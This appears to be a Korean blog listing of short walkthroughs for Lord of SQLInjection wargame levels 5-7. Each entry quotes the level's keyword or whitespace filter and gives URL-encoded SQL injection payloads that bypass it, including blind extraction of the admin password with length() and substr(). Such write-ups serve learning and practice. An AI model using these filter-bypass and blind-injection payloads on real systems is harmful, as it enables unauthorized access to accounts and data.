728x90 해킹3 LOS 7.orge 풀이 (난이도 상) :: 문제풀이 if(preg_match ('/or|and/i', $_GET [pw ])) exit("HeHe"); 여기도 마찬가지로 or과 and를 사용할 수 없게 되어있다. ?pw=%27%20||%20length(pw)>5%23 이걸 사용했더니 hello guest가 떠서 5이상의 숫자를 넣어보았다. ?pw=%27%20||%20length(pw)=8%23 여기서 hello admin이 떠서 pw의 길이가 8이라는 것을 알아내었다. ?pw=%27%20||%20id=%27admin%27%26%26substr(pw,1,1)=6%23 ?pw=%27%20||%20id=%27admin%27%26%26substr(pw,2,1)=%27c ?pw=%27%20||%20id=%27admin%27%26%26substr(pw.. 2019. 11. 8. LOS 6.DARKELF 풀이 (난이도 하) :: 문제풀이 if(preg_match ('/or|and/i', $_GET [pw ])) exit("HeHe"); 이 부분으로 보아 or과 and를 사용할 수 없다는 것을 알고 or을 우회하는 방법을 찾아보았다. or은||으로,and는 &&으로 나타낼 수 있다. & url기호는 %26이다. 5번과 비슷하게 or부분에 ||로 대체해 풀었다. :: 답 ?pw=%27%20||%20id=%27admin 2019. 11. 5. LOS 5.wolfman 풀이 (난이도 하..?) :: 문제풀이 if(preg_match ('/ /i', $_GET [pw ])) exit("No whitespace ~_~"); 이 부분으로 보아 공백을 사용할 수 없다는 것을 알고 공백을 다른 방식으로 표현하는 방법을 찾아보았다. Tab (%09) // URL에서 사용된 대체 문자. Line Feed (%0A) Vertical Tab (%0B) Form Feed (%0C) Carriage Return (%0D) 구글링 하여 이런 종류가 있다는 것을 알아내었다. 첫 번째 Tab에서 ‘URL에서 사용된 대체 문자’의 뜻을 몰라 Line Feed를 사용하여 문제를 풀었다. :: 답 ?pw=%27%0Aor%0Aid=%27admin을 주소창에 쳤다. 2019. 11. 5. 이전 1 다음 728x90
